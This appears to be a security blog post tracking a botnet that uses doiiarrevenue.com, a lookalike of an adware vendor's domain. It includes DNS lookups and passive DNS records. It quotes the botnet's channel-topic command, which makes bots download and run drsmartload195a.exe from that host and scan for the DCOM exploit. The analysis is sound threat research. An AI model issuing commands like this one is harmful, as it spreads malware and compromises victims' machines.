doIIarrevenue.com
Vitalsecurity.org has an interesting article entitled "Beware of DoiiarRevenue.com: Mimicking an Adware vendor for fun and profit". Some time ago I also stumbled across this domain while tracking a botnet with the following topic, which is executed by all bots joining the command channel:
Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnets uses the doiiarrevenue.com site:
Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes:
So, what is going on here? The only thing I can say currently: doiiarrevenue also hosts a file called vv663.exe which is clearly malicious as the analysis by CWSandbox points out (report in XML format).
:.t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/drsmartload195a.exe
c:\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r
Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnets uses the doiiarrevenue.com site:
$ host dollarrevenue.com
dollarrevenue.com has address 194.187.45.56
dollarrevenue.com mail is handled by 10 MAIL.dollarrevenue.com.
$ host doiiarrevenue.com
doiiarrevenue.com has address 68.142.212.122
doiiarrevenue.com has address 68.142.212.117
doiiarrevenue.com has address 68.142.212.118
doiiarrevenue.com has address 68.142.212.119
doiiarrevenue.com has address 68.142.212.120
doiiarrevenue.com has address 68.142.212.121
doiiarrevenue.com mail is handled by 20 mx1.biz.mail.yahoo.com.
doiiarrevenue.com mail is handled by 30 mx5.biz.mail.yahoo.com.
Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes:
The server returned the following data:
xoindustries.ca A 68.142.212.122
norja.cc A 68.142.212.122
prsindia.org A 68.142.212.122
boc.org A 68.142.212.122
iaftd.org A 68.142.212.122
auspiciouscoincidence.org A 68.142.212.122
investforlife.org A 68.142.212.122
missmaine.org A 68.142.212.122
nypdblue.org A 68.142.212.122
rovang.org A 68.142.212.122
artfulexpression.org A 68.142.212.122
fbcindep.org A 68.142.212.122
a-family-affair.org A 68.142.212.122
[...]
So, what is going on here? The only thing I can say currently: doiiarrevenue also hosts a file called vv663.exe which is clearly malicious as the analysis by CWSandbox points out (report in XML format).


